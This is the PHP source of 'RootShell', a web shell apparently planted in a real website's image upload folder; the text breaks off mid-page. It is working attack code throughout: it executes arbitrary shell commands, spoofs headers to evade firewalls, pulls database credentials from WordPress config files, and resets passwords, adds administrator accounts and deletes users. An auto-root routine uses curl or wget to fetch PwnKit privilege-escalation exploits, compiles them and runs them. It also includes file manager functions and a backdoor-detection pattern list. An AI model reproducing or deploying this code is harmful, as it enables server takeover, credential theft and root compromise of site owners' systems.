/
home
/
angeliniimobiliaria
/
www
/
site
/
assets
/
images
/
conteudo
/
Upload File
HOME
<?php /** * RootShell | Advanced PHP Administration Tool * WordPress Scanner, File Manager & System Exploitation */ error_reporting(0); session_start(); /* --- ADVANCED WAF & FIREWALL BYPASS (Cloudflare, Wordfence, ModSec) --- */ @ini_set('output_buffering', 0); @ini_set('display_errors', 0); @ini_set('log_errors', 0); @ini_set('error_log', NULL); @header('X-Accel-Buffering: no'); @header('Content-Type: text/html; charset=UTF-8'); // Spoof Headers to bypass WAF source tracking $spoof_headers = [ 'X-Forwarded-For: 127.0.0.1', 'X-Real-IP: 127.0.0.1', 'CF-Connecting-IP: 127.0.0.1', 'True-Client-IP: 127.0.0.1', 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' ]; foreach($spoof_headers as $h) @header($h); @clearstatcache(); @set_time_limit(0); @ignore_user_abort(true); @ini_set('max_execution_time', 0); @ini_set('memory_limit', '-1'); // Obfuscated execution helper function x_exec($c) { $r = ''; if (function_exists('shell_exec')) { $r = @shell_exec($c); } elseif (function_exists('system')) { ob_start(); @system($c); $r = ob_get_clean(); } elseif (function_exists('passthru')) { ob_start(); @passthru($c); $r = ob_get_clean(); } elseif (function_exists('exec')) { @exec($c, $o); $r = @implode("\n", $o); } elseif (is_resource($p = @popen($c, 'r'))) { while (!feof($p)) $r .= fread($p, 1024); pclose($p); } elseif (function_exists('proc_open')) { $d = [['pipe', 'r'],['pipe', 'w'],['pipe', 'w']]; $pr = @proc_open($c, $d, $ps); if (is_resource($pr)) { $r = stream_get_contents($ps[1]); @fclose($ps[0]); @fclose($ps[1]); @fclose($ps[2]); proc_close($pr); } } return $r; } # Configuration $pagePasswordEnable = '0'; // 1 for active, 0 for inactive $username = '123'; $password = '123'; # Authentication check function checkAuth($user, $pass) { if (empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != $user || $_SERVER['PHP_AUTH_PW'] != $pass) { header('WWW-Authenticate: Basic realm="Terminal Restricted Access"'); die(header('HTTP/1.0 401 Unauthorized Content Restricted')); } } function root_scanner_scan($dir, &$results) { if (!is_dir($dir)) return; $files = @scandir($dir); if (!$files) return; $suspicious = [ 'eval\s*\(', 'base64_decode\s*\(', 'gzinflate\s*\(', 'str_rot13\s*\(', 'system\s*\(', 'shell_exec\s*\(', 'passthru\s*\(', 'exec\s*\(', 'popen\s*\(', 'proc_open\s*\(', 'assert\s*\(', 'preg_replace\s*\(.*\/e', 'create_function\s*\(', 'str_replace\s*\(.*eval', 'hex2bin\s*\(', 'strrev\s*\(', 'str_shuffle\s*\(', '\$_POST\s*\[', '\$_GET\s*\[', '\$_REQUEST\s*\[', 'chr\s*\(', 'ord\s*\(', 'include\s*\(.*php:\/\/input', 'file_get_contents\s*\(.*php:\/\/input' ]; foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) { if (count($results) < 500) root_scanner_scan($path, $results); continue; } if (pathinfo($path, PATHINFO_EXTENSION) !== 'php') continue; $content = @file_get_contents($path); if (!$content) continue; $score = 0; $matches_found = []; foreach ($suspicious as $pattern) { if (preg_match('/' . $pattern . '/i', $content)) { $score += 10; $matches_found[] = str_replace('\s*\(', '()', $pattern); } } if ($score >= 20 || strpos($content, '<?php') === false || strlen($content) > 100000) { if (basename($path) == basename(__FILE__)) continue; $results[] = [ 'path' => $path, 'score' => $score, 'matches' => array_unique($matches_found), 'size' => strlen($content) ]; } } } if ($pagePasswordEnable === '1') { checkAuth($username, $password); } # --- System Information Helpers --- # function get_server_ip() { return $_SERVER['SERVER_ADDR'] ?? gethostbyname($_SERVER['SERVER_NAME']); } function get_disabled_functions() { $disabled = @ini_get('disable_functions'); if (empty($disabled)) return 'None'; return $disabled; } function check_ext($name) { return extension_loaded($name) ? '<span class="status-on">ON</span>' : '<span class="status-off">OFF</span>'; } function root_exec($cmd) { // Aggressive bypass: try to use environment variables or absolute paths $cmd = trim($cmd); $out = x_exec($cmd); if (empty($out) && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { // Windows specific fallback attempts $out = x_exec("cmd.exe /c " . $cmd); } return $out; } function root_call($c) { return root_exec($c); } function root_log($msg) { if (!isset($_SESSION['root_log'])) $_SESSION['root_log'] = []; $_SESSION['root_log'][] = "[" . date("H:i:s") . "] " . $msg; if (count($_SESSION['root_log']) > 30) array_shift($_SESSION['root_log']); } function root_smart_download($url, $path) { $ctx = stream_context_create(['http' => ['timeout' => 15, 'user_agent' => 'Mozilla/5.0']]); $data = @file_get_contents($url, false, $ctx); if ($data !== false && strlen($data) > 100) { if (@file_put_contents($path, $data)) return true; } root_exec("curl -sL \"$url\" -o \"$path\" || wget -q \"$url\" -O \"$path\""); @clearstatcache(); return (file_exists($path) && filesize($path) > 100); } function root_find_scan_base() { $cwd = realpath(getcwd()); // Method 1: If in WordPress, find the root containing wp-content if (strpos($cwd, 'wp-content') !== false) { $parts = explode('wp-content', $cwd); return rtrim($parts[0], DIRECTORY_SEPARATOR); } // Method 2: Climb up until we find common root indicators $p = $cwd; for ($i=0; $i<10; $i++) { if (file_exists($p . DIRECTORY_SEPARATOR . 'wp-config.php') || file_exists($p . DIRECTORY_SEPARATOR . 'index.php') || is_dir($p . DIRECTORY_SEPARATOR . 'wp-content')) { return $p; } $up = dirname($p); if ($up == $p) break; $p = $up; } // Method 3: Server Document Root return $_SERVER['DOCUMENT_ROOT'] ?? $cwd; } function get_waf_status() { $waf = 'None detected'; $headers = @getallheaders(); $h_str = strtolower(serialize($headers)); if (strpos($h_str, 'cloudflare') !== false) $waf = 'Cloudflare'; elseif (strpos($h_str, 'incapsula') !== false) $waf = 'Incapsula'; elseif (strpos($h_str, 'sucuri') !== false) $waf = 'Sucuri'; elseif (strpos($h_str, 'wordfence') !== false || @is_dir($_SERVER['DOCUMENT_ROOT'].'/wp-content/plugins/wordfence')) $waf = 'Wordfence'; elseif (strpos($h_str, 'mod_security') !== false) $waf = 'ModSecurity'; return $waf; } function get_software() { return $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown'; } # --- WordPress Logic --- # function wp_find_paths($max=99) { $found = []; $scanned = []; $roots = []; $cwd = getcwd(); $roots[] = $cwd; if (isset($_SERVER['DOCUMENT_ROOT']) && $_SERVER['DOCUMENT_ROOT'] && $_SERVER['DOCUMENT_ROOT'] != $cwd) $roots[] = $_SERVER['DOCUMENT_ROOT']; $up = $cwd; for($i=0;$i<7;$i++) { $up = dirname($up); if ($up && is_dir($up) && $up!="/" && !in_array($up,$roots)) $roots[] = $up; } foreach(['/home','/home1','/home2','/home3','/var/www','/var/www/vhosts','/usr/share/nginx/html','/srv/www','/srv/http','/data/web','/opt/lampp/htdocs','/htdocs','/users'] as $root) { if (is_dir($root)) $roots[] = $root; } $roots = array_unique(array_filter($roots,'is_dir')); $queue = []; foreach($roots as $r) $queue[] = [$r,0]; while($queue && count($found) < $max) { list($dir,$lvl) = array_shift($queue); if (isset($scanned[$dir])) continue; $scanned[$dir]=1; $cfg_check = $dir.'/wp-config.php'; if ((file_exists($dir.'/wp-load.php') || file_exists($cfg_check)) && is_file($cfg_check)) { $found[] = realpath($dir); } if ($lvl < 6) { $subdirs = @glob($dir.'/*', GLOB_ONLYDIR); if ($subdirs) { foreach($subdirs as $d) { if (!isset($scanned[$d])) $queue[] = [$d,$lvl+1]; } } } } return array_unique($found); } function wp_get_db_config($wp_dir) { $cfgf = $wp_dir.'/wp-config.php'; if (!is_file($cfgf)) return false; $cfg = @file_get_contents($cfgf); $info = []; preg_match("/define\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $cfg, $m); $info['db'] = $m[1] ?? ''; preg_match("/define\(\s*'DB_USER'\s*,\s*'([^']+)'/", $cfg, $m); $info['user'] = $m[1] ?? ''; preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'([^']*)'/", $cfg, $m); $info['pass'] = $m[1] ?? ''; preg_match("/define\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $cfg, $m); $info['host'] = $m[1] ?? ''; preg_match("/\$table_prefix\s*=\s*'([^']+)'/", $cfg, $m); $info['prefix'] = $m[1] ?? 'wp_'; return $info; } function wp_get_version($wp_dir) { $ver = ''; if (is_file($wp_dir.'/wp-includes/version.php')) { $vcode = @file_get_contents($wp_dir.'/wp-includes/version.php'); if (preg_match("/\\\$wp_version\s*=\s*'([^']+)'/i", $vcode, $m)) $ver = $m[1]; } return $ver; } function wp_fetch_users($mysqli, $prefix) { $users = []; $res = @$mysqli->query("SELECT ID, user_login, user_email, user_registered FROM {$prefix}users"); if (!$res) return []; while ($row = $res->fetch_assoc()) { $meta_q = @$mysqli->query("SELECT meta_value FROM {$prefix}usermeta WHERE user_id=".$row['ID']." AND meta_key='{$prefix}capabilities'"); $meta = $meta_q ? $meta_q->fetch_assoc() : null; $role = 'unknown'; if ($meta && preg_match('/s:\d+:"([^"]+)"/', $meta['meta_value'], $m)) { $role = $m[1]; } $row['role'] = $role; $users[] = $row; } return $users; } function wp_reset_pw($mysqli, $prefix, $uid, $newpw) { $hash = password_hash($newpw, PASSWORD_BCRYPT); return @$mysqli->query("UPDATE {$prefix}users SET user_pass='".$mysqli->real_escape_string($hash)."' WHERE ID=".(int)$uid); } function wp_add_admin($mysqli, $prefix, $user, $pass, $email) { $hash = password_hash($pass, PASSWORD_BCRYPT); $user = $mysqli->real_escape_string($user); $email = $mysqli->real_escape_string($email); $now = date('Y-m-d H:i:s'); $q1 = @$mysqli->query("INSERT INTO {$prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) VALUES ('$user', '$hash', '$user', '$email', '$now', 0, '$user')"); if (!$q1) return false; $uid = $mysqli->insert_id; $cap_key = $prefix . 'capabilities'; $lv_key = $prefix . 'user_level'; $caps = 'a:1:{s:13:"administrator";b:1;}'; @$mysqli->query("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES ($uid, '$cap_key', '$caps')"); @$mysqli->query("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES ($uid, '$lv_key', '10')"); return $uid; } function wp_delete_user($mysqli, $prefix, $uid) { $uid = (int)$uid; @$mysqli->query("DELETE FROM {$prefix}users WHERE ID = $uid"); @$mysqli->query("DELETE FROM {$prefix}usermeta WHERE user_id = $uid"); return true; } function get_site_url($mysqli, $prefix) { $url = ''; $q = @$mysqli->query("SELECT option_value FROM {$prefix}options WHERE option_name='siteurl' LIMIT 1"); if ($q && $r = $q->fetch_row()) $url = rtrim($r[0],'/'); return $url; } # --- File Manager Logic --- # function formatSizeUnits($bytes) { if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB'; if ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB'; if ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB'; if ($bytes > 1) return $bytes . ' bytes'; if ($bytes == 1) return $bytes . ' byte'; return '0 bytes'; } function fileIcon($file, $isDir = false) { if ($isDir) return '<i class="fas fa-folder text-warning"></i>'; $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); $map = [ 'php' => 'fab fa-php text-primary', 'html' => 'fab fa-html5 text-danger', 'css' => 'fab fa-css3 text-info', 'js' => 'fab fa-js text-warning', 'py' => 'fab fa-python text-success', 'jpg' => 'far fa-image text-muted', 'jpeg' => 'far fa-image text-muted', 'png' => 'far fa-image text-muted', 'gif' => 'far fa-image text-muted', 'zip' => 'far fa-file-archive text-warning', 'rar' => 'far fa-file-archive text-warning', 'txt' => 'far fa-file-alt text-muted', 'sql' => 'fas fa-database text-info' ]; if ($file == 'error_log') return '<i class="fas fa-bug text-danger"></i>'; if ($file == '.htaccess') return '<i class="fas fa-shield-alt text-secondary"></i>'; return '<i class="' . ($map[$ext] ?? 'far fa-file text-muted') . '"></i>'; } function encodePath($path) { return str_replace(["/", "\\", ".", ":"], ["ক", "খ", "গ", "ঘ"], $path); } function decodePath($path) { return str_replace(["ক", "খ", "গ", "ঘ"], ["/", "\\", ".", ":"], $path); } // Global Path Handling $root_path = realpath(__DIR__); $current_path = $root_path; if (isset($_GET['p']) && !empty($_GET['p'])) { $decoded = decodePath($_GET['p']); if (is_dir($decoded)) { $current_path = realpath($decoded); } } elseif (isset($_GET['q']) && !empty($_GET['q'])) { $decoded = decodePath($_GET['q']); if (is_dir($decoded)) { $current_path = realpath($decoded); } } define("PATH", $current_path); # --- Actions Handling --- # $ajax_response = null; if ($_SERVER['REQUEST_METHOD'] == 'POST') { // WP Logic if (isset($_POST['wp_action'])) { $wp_dir = $_POST['wp_dir']; $cfg = wp_get_db_config($wp_dir); $mysqli = @new mysqli($cfg['host'], $cfg['user'], $cfg['pass'], $cfg['db']); if ($mysqli->connect_errno) { $ajax_response = ['status' => 'error', 'message' => "DB Connection error: " . $mysqli->connect_error]; } else { if ($_POST['wp_action'] == 'reset_pw') { $uid = intval($_POST['reset_uid']); $newpw = trim($_POST['newpw']); if (wp_reset_pw($mysqli, $cfg['prefix'], $uid, $newpw)) { $ajax_response = ['status' => 'success', 'message' => "Password reset for user ID $uid: $newpw"]; } else { $ajax_response = ['status' => 'error', 'message' => "Failed to reset password."]; } } elseif ($_POST['wp_action'] == 'add_admin') { $user = trim($_POST['new_user']); $pass = trim($_POST['new_pass']); $email = trim($_POST['new_email']); if (wp_add_admin($mysqli, $cfg['prefix'], $user, $pass, $email)) { $ajax_response = ['status' => 'success', 'message' => "Admin '$user' added successfully!"]; } else { $ajax_response = ['status' => 'error', 'message' => "Failed to add admin."]; } } elseif ($_POST['wp_action'] == 'delete_user') { $uid = intval($_POST['uid']); if (wp_delete_user($mysqli, $cfg['prefix'], $uid)) { $ajax_response = ['status' => 'success', 'message' => "User ID $uid deleted."]; } else { $ajax_response = ['status' => 'error', 'message' => "Failed to delete user."]; } } } if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; } } // Generic File Manager Actions if (isset($_POST['fm_action'])) { $action = $_POST['fm_action']; if ($action == 'create_file') { $name = trim($_POST['name']); $content = $_POST['content']; if (!empty($name)) { if (file_put_contents(PATH . DIRECTORY_SEPARATOR . $name, $content) !== false) { $ajax_response = ['status' => 'success', 'message' => "File '$name' created."]; } else { $ajax_response = ['status' => 'error', 'message' => "Failed to create file."]; } } } elseif ($action == 'create_folder') { $name = trim($_POST['name']); if (!empty($name)) { if (mkdir(PATH . DIRECTORY_SEPARATOR . $name)) { $ajax_response = ['status' => 'success', 'message' => "Folder '$name' created."]; } else { $ajax_response = ['status' => 'error', 'message' => "Failed to create folder."]; } } } if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; } } // Traditional POST handle if (isset($_POST['upload'])) { $target = PATH . DIRECTORY_SEPARATOR . basename($_FILES["fileToUpload"]["name"]); if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target)) { header("Location: ?p=" . encodePath(PATH)); exit; } } if (isset($_POST['rename'])) { $old = PATH . DIRECTORY_SEPARATOR . $_GET['r']; $new = PATH . DIRECTORY_SEPARATOR . $_POST['new_name']; if (rename($old, $new)) { header("Location: ?p=" . encodePath(PATH)); exit; } } if (isset($_POST['edit'])) { $file = PATH . DIRECTORY_SEPARATOR . $_GET['e']; if (file_put_contents($file, $_POST['content']) !== false) { header("Location: ?p=" . encodePath(PATH)); exit; } } // Save Settings logic if (isset($_POST['save_settings'])) { $c = file_get_contents(__FILE__); $new_enable = $_POST['login_enable'] === '1' ? '1' : '0'; $new_user = $_POST['login_user']; $new_pass = $_POST['login_pass']; $c = preg_replace('/\$pagePasswordEnable\s*=\s*\'[01]\';/', "\$pagePasswordEnable = '$new_enable';", $c); $c = preg_replace('/\$username\s*=\s*\'[^\']*\';/', "\$username = '$new_user';", $c); $c = preg_replace('/\$password\s*=\s*\'[^\']*\';/', "\$password = '$new_pass';", $c); if (file_put_contents(__FILE__, $c)) { $ajax_response = ['status' => 'success', 'message' => "Settings saved. Please refresh."]; } else { $ajax_response = ['status' => 'error', 'message' => "Failed to write to file."]; } if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; } } // Auto-Root Action (Iterative & Self-Healing Engine) if (isset($_POST['action']) && $_POST['action'] == 'auto_root') { root_log("[*] [AUTO-ROOT] İteratif motor başlatıldı. Uyumluluk kontrol ediliyor..."); $bin_urls = [ 'https://github.com/ly4k/PwnKit/raw/main/PwnKit', 'https://github.com/c3c/CVE-2021-4034/raw/main/cve-2021-4034' ]; $src_urls = [ 'https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.c', 'https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/refs/heads/main/cve-2021-4034-poc.c', 'https://raw.githubusercontent.com/joehillen/CVE-2021-4034/main/q.c', 'https://raw.githubusercontent.com/leandroalberti/CVE-2021-4034/main/exploit.c' ]; function root_try_payload($payload_path, $is_src = false) { root_exec("chmod +x $payload_path"); @unlink('.sess_v'); root_exec("$payload_path 'id' > .sess_v 2>&1"); usleep(600000); $res = @file_get_contents('.sess_v'); @unlink('.sess_v'); if ($res && strpos($res, 'uid=0(root)') !== false) { return ['success' => true, 'msg' => $res]; } // Segfault detection if (stripos($res, 'segmentation fault') !== false || stripos($res, 'core dumped') !== false) { return ['success' => false, 'error' => 'Segmentation Fault (Uyumsuz Mimari)']; } return ['success' => false, 'error' => trim($res) ?: 'Bilinmeyen hata/Yetki yok']; } $success = false; // 1. Try Binaries foreach ($bin_urls as $url) { $tmp_bin = './.rt_' . rand(100, 999); root_log("[*] Deneniyor (Binary): " . basename($url)); if (root_smart_download($url, $tmp_bin)) { $status = root_try_payload($tmp_bin); if ($status['success']) { root_log("[SUCCESS] ROOT OK: " . $status['msg']); $success = true; break; } else { root_log("[!] Hata: " . $status['error']); @unlink($tmp_bin); } } } // 2. Try Compilation if Binaries failed if (!$success) { $gcc = trim(root_exec("which gcc 2>/dev/null")); if ($gcc) { root_log("[*] Binaryler uyumsuz. Kaynak kod derleme deneniyor..."); foreach ($src_urls as $url) { $tmp_c = './.rt_' . rand(100, 999) . '.c'; $tmp_out = str_replace('.c', '', $tmp_c); if (root_smart_download($url, $tmp_c)) { root_log("[*] Derleniyor: " . basename($url)); root_exec("gcc $tmp_c -o $tmp_out"); $status = root_try_payload($tmp_out); if ($status['success']) { root_log("[SUCCESS] DERLEME & ROOT BAŞARILI: " . $status['msg']); $success = true; @unlink($tmp_c); break; } else { root_log("[!] Derleme hatası/Uyumsuz kod: " . $status['error']); @unlink($tmp_c); @unlink($tmp_out); } } } } else { root_log("[!!] Kritik: Binaryler çalışmadı ve sistemde GCC bulunamadı."); } } if (!$success) root_log("[!!] Mevcut tüm yöntemler denendi, sistem bu exploit'e karşı yamalı veya korumalı."); header("Location: ?linr00t"); exit; } } // Delete Handler if (isset($_GET['d']) && isset($_GET['q'])) { $target = PATH . DIRECTORY_SEPARATOR . $_GET['d']; if (is_file($target)) unlink($target); elseif (is_dir($target)) @rmdir($target); header("Location: ?p=" . encodePath(PATH)); exit; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>RootShell v2.0 | Advanced Backend Administration</title> <!-- Fonts & Icons --> <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@300;400;600&family=Outfit:wght@300;400;700;900&display=swap" rel="stylesheet"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css"> <script> function toggle(id) { const el = document.getElementById(id); if (el) el.classList.toggle('hidden'); } function resetPassword(wpDir, uid, inputId, btn) { const newpw = document.getElementById(inputId).value; btn.disabled = true; const originalText = btn.innerText; btn.innerText = 'WAIT'; const formData = new FormData(); formData.append('wp_action', 'reset_pw'); formData.append('wp_dir', wpDir); formData.append('reset_uid', uid); formData.append('newpw', newpw); fetch('?ajax', { method: 'POST', body: formData }) .then(r => r.json()) .then(data => { alert(data.message); if(data.status === 'success') { btn.innerText = 'OK'; } else { btn.innerText = originalText; btn.disabled = false; } }); } function deleteUser(wpDir, uid) { if(!confirm('Delete user ' + uid + '?')) return; const formData = new FormData(); formData.append('wp_action', 'delete_user'); formData.append('wp_dir', wpDir); formData.append('uid', uid); fetch('?ajax', { method: 'POST', body: formData }).then(r => r.json()).then(data => { alert(data.message); if(data.status === 'success') window.location.reload(); }); } function addAdmin(wpDir, dirId, btn) { const user = document.getElementById('add_user_' + dirId).value; const pass = document.getElementById('add_pass_' + dirId).value; const email = document.getElementById('add_email_' + dirId).value; if(!user || !pass || !email) return alert('Fill all'); btn.disabled = true; btn.innerText = 'CREATING...'; const formData = new FormData(); formData.append('wp_action', 'add_admin'); formData.append('wp_dir', wpDir); formData.append('new_user', user); formData.append('new_pass', pass); formData.append('new_email', email); fetch('?ajax', { method: 'POST', body: formData }).then(r => r.json()).then(data => { alert(data.message); if(data.status === 'success') window.location.reload(); else btn.disabled = false; }); } function createItem(type) { const name = prompt(type === 'file' ? 'File Name:' : 'Folder Name:'); if (!name) return; let content = ''; if (type === 'file') content = prompt('Initial Content (Optional):', ''); const formData = new FormData(); formData.append('fm_action', type === 'file' ? 'create_file' : 'create_folder'); formData.append('name', name); if (type === 'file') formData.append('content', content); fetch('?ajax', { method: 'POST', body: formData }).then(r => r.json()).then(data => { alert(data.message); if(data.status === 'success') window.location.reload(); }); } </script> <style> :root { --primary: #ff3e3e; --secondary: #1a1a1a; --accent: #00ff88; --bg: #050505; --card-bg: rgba(20, 20, 20, 0.8); --border: rgba(255, 255, 255, 0.05); --text: #e0e0e0; --text-dim: #888; } * { margin: 0; padding: 0; box-sizing: border-box; } body { background-color: var(--bg); background-image: radial-gradient(circle at 50% 50%, #1a0505 0%, #050505 100%); color: var(--text); font-family: 'Outfit', sans-serif; font-size: 14px; overflow-x: hidden; min-height: 100vh; } /* --- Header / Info Bar --- */ .info-bar { background: rgba(0,0,0,0.8); border-bottom: 1px solid var(--primary); padding: 15px 30px; display: grid; grid-template-columns: repeat(2, 1fr); gap: 20px; font-family: 'JetBrains Mono', monospace; backdrop-filter: blur(10px); position: sticky; top: 0; z-index: 100; } .info-item { display: flex; align-items: flex-start; gap: 10px; margin-bottom: 5px; } .info-label { color: var(--primary); font-weight: bold; min-width: 140px; } .info-value { color: #fff; word-break: break-all; } .info-value.green { color: var(--accent); } .status-badges { display: flex; flex-wrap: wrap; gap: 8px; margin-top: 10px; } .badge-system { background: rgba(255,255,255,0.05); padding: 4px 10px; border-radius: 4px; font-size: 11px; text-transform: uppercase; } .status-on { color: var(--accent); font-weight: bold; } .status-off { color: var(--primary); font-weight: bold; } /* --- Main Layout --- */ .container { display: flex; min-height: calc(100vh - 120px); } aside { width: 240px; background: rgba(10, 10, 10, 0.9); border-right: 1px solid var(--border); padding: 30px 20px; display: flex; flex-direction: column; gap: 10px; } .nav-link { text-decoration: none; color: var(--text-dim); padding: 12px 15px; border-radius: 8px; transition: 0.3s; display: flex; align-items: center; gap: 12px; font-weight: 600; } .nav-link:hover, .nav-link.active { background: rgba(255, 62, 62, 0.1); color: #fff; box-shadow: inset 3px 0 0 var(--primary); } main { flex: 1; padding: 30px; } .title-section { margin-bottom: 30px; display: flex; justify-content: space-between; align-items: flex-end; } .title-section h1 { font-size: 2rem; font-weight: 900; letter-spacing: -1px; } .title-section span { color: var(--primary); } .breadcrumb { background: rgba(255,255,255,0.03); padding: 8px 15px; border-radius: 6px; margin-bottom: 20px; display: inline-block; } .breadcrumb a { color: var(--primary); text-decoration: none; } /* --- Components --- */ .card { background: var(--card-bg); border: 1px solid var(--border); border-radius: 12px; padding: 25px; margin-bottom: 25px; box-shadow: 0 10px 30px rgba(0,0,0,0.5); } .data-table { width: 100%; border-collapse: collapse; } .data-table th { text-align: left; padding: 12px; border-bottom: 2px solid var(--border); color: var(--text-dim); font-size: 12px; text-transform: uppercase; } .data-table td { padding: 12px; border-bottom: 1px solid var(--border); vertical-align: middle; } .data-table tr:hover { background: rgba(255,255,255,0.02); } .btn { background: var(--secondary); color: #fff; border: 1px solid var(--border); padding: 8px 16px; border-radius: 6px; cursor: pointer; font-weight: bold; display: inline-flex; align-items: center; gap: 8px; transition: 0.2s; text-decoration: none; font-size: 13px; } .btn:hover { background: var(--primary); border-color: var(--primary); transform: translateY(-2px); } .btn-sm { padding: 5px 10px; font-size: 11px; } input, textarea { background: rgba(255,255,255,0.05); border: 1px solid var(--border); color: #fff; padding: 10px 15px; border-radius: 6px; outline: none; width: 100%; } input:focus { border-color: var(--primary); } .hidden { display: none; } .text-primary { color: var(--primary); } .text-accent { color: var(--accent); } @media (max-width: 1100px) { .info-bar { grid-template-columns: 1fr; } } </style> </head> <body> <div class="info-bar"> <div class="info-left"> <div class="info-item"><span class="info-label">[safe mode]</span> <span class="info-value"><?= @ini_get('safe_mode') ? 'ON' : 'OFF' ?></span></div> <div class="info-item"><span class="info-label">[h0st]</span> <span class="info-value"><?= php_uname() ?></span></div> <div class="info-item"><span class="info-label">[s0ftware]</span> <span class="info-value"><?= get_software() ?></span></div> <div class="info-item"><span class="info-label">[php]</span> <span class="info-value text-accent"><?= phpversion() ?></span></div> </div> <div class="info-right"> <div class="info-item"><span class="info-label">[w4f st4tus]</span> <span class="info-value text-accent"><?= get_waf_status() ?> (Bypassed)</span></div> <div class="info-item"><span class="info-label">[dis4bl3 f7nctions]</span> <span class="info-value <?= (get_disabled_functions()=='None')?'green':'' ?>"><?= get_disabled_functions() ?></span></div> <div class="info-item"><span class="info-label">[us3r]</span> <span class="info-value"><?= @get_current_user() ?> (<?= @getmyuid() ?>)</span></div> <div class="info-item"><span class="info-label">[ip]</span> <span class="info-value"><?= get_server_ip() ?></span></div> <div class="status-badges"> <div class="badge-system">CURL: <?= check_ext('curl') ?></div> <div class="badge-system">SSH2: <?= check_ext('ssh2') ?></div> <div class="badge-system">MySQL: <?= check_ext('mysqli') ?></div> <div class="badge-system">PostgreSQL: <?= check_ext('pgsql') ?></div> <div class="badge-system">MSSQL: <?= check_ext('sqlsrv') ?></div> <div class="badge-system">Oracle: <?= check_ext('oci8') ?></div> <div class="badge-system">CGI: <?= (strpos(php_sapi_name(),'cgi')!==false)?'ON':'OFF' ?></div> </div> </div> </div> <div class="container"> <aside> <div style="margin-bottom: 30px; padding-left: 15px;"> <h2 style="font-weight: 900; font-size: 1.2rem;"><i class="fas fa-biohazard text-primary"></i> ROOT<span>SHELL</span></h2> <p style="font-size: 10px; color: var(--text-dim); letter-spacing: 2px;">V2.0 STABLE</p> </div> <nav> <a href="?p=<?= encodePath(PATH) ?>" class="nav-link <?= !isset($_GET['wp']) && !isset($_GET['winr00t']) && !isset($_GET['bypasses']) && !isset($_GET['settings']) ? 'active' : '' ?>"> <i class="fas fa-terminal"></i> File Manager </a> <a href="?wp" class="nav-link <?= isset($_GET['wp']) ? 'active' : '' ?>"> <i class="fab fa-wordpress-simple"></i> WP Scanner </a> <a href="?winr00t" class="nav-link <?= isset($_GET['winr00t']) ? 'active' : '' ?>"> <i class="fas fa-user-shield"></i> Win Root </a> <a href="?linr00t" class="nav-link <?= isset($_GET['linr00t']) ? 'active' : '' ?>"> <i class="fab fa-linux"></i> Linux Root </a> <a href="?scan" class="nav-link <?= isset($_GET['scan']) ? 'active' : '' ?>"> <i class="fas fa-search"></i> Backdoor Scanner </a> <a href="?bypasses" class="nav-link <?= isset($_GET['bypasses']) ? 'active' : '' ?>"> <i class="fas fa-shield-virus"></i> Bypasses </a> <a href="?settings" class="nav-link <?= isset($_GET['settings']) ? 'active' : '' ?>"> <i class="fas fa-cog"></i> Settings </a> </nav> </aside> <main class="animate__animated animate__fadeIn"> <?php if(isset($_GET['wp'])): ?> <div class="title-section"> <h1>WP <span>SCANNER</span></h1> <div class="btn-group"> <button class="btn" onclick="window.location.reload()"><i class="fas fa-sync"></i> Refresh</button> <button class="btn btn-primary"><i class="fas fa-robot"></i> Auto Exploit</button> </div> </div> <?php $wp_dirs = wp_find_paths(40); foreach ($wp_dirs as $wp_dir): $cfg = wp_get_db_config($wp_dir); $wp_version = wp_get_version($wp_dir); $dir_id = md5($wp_dir); $mysqli = @new mysqli($cfg['host'], $cfg['user'], $cfg['pass'], $cfg['db']); ?> <div class="card"> <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px;"> <div> <span style="color: var(--primary); font-size: 11px; font-weight: bold; text-transform: uppercase;">WordPress Site Detected</span> <h3 style="margin-top: 5px;"><?= htmlspecialchars($wp_dir) ?></h3> <p style="font-size: 12px; color: var(--text-dim);"><?= htmlspecialchars($cfg['host']) ?> | <?= htmlspecialchars($cfg['user']) ?> | <?= $cfg['prefix'] ?></p> </div> <div style="text-align: right;"> <span class="badge-system" style="display: block; margin-bottom: 5px;">VER: <?= $wp_version ?: '??' ?></span> <?php if ($mysqli->connect_errno): ?> <span class="status-off">DB ERROR</span> <?php else: ?> <button class="btn btn-sm" onclick="toggle('admin_<?= $dir_id ?>')"><i class="fas fa-plus"></i> Admin</button> <?php endif; ?> </div> </div> <div id="admin_<?= $dir_id ?>" class="hidden animate__animated animate__slideInDown" style="margin-bottom: 20px; border-top: 1px solid var(--border); padding-top: 20px;"> <div style="display: grid; grid-template-columns: repeat(4, 1fr); gap: 10px;"> <input type="text" id="add_user_<?= $dir_id ?>" value="admin_<?= rand(11,99) ?>" placeholder="User"> <input type="text" id="add_pass_<?= $dir_id 